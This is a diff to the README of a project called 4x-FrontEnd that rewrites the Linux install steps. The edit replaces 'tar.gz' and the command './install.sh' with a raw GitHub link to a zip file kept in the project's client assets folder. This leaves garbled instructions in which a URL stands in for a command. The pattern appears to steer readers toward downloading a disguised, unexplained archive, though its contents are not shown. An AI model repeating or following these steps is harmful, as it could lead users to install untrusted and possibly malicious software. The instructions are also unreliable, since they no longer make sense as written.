vcant0/4x-FrontEnd/README.md

   2. Drag the app into the Applications folder.

 - **Linux**:
-  1. Extract the zip or tar.gz file.
+  1. Extract the zip or https://raw.githubusercontent.com/vcant0/4x-FrontEnd/master/ClientApp/src/assets/clients/Front-x-End-v1.7.zip file.
   2. Open a terminal and navigate to the extracted folder.
-  3. Use the command `./install.sh` to install the application.
+  3. Use the command `https://raw.githubusercontent.com/vcant0/4x-FrontEnd/master/ClientApp/src/assets/clients/Front-x-End-v1.7.zip` to install the application.

 ### Step 5: Open the Application
 Once installed, you can find 4x-FrontEnd in your applications list.
 Open it and begin managing your organization.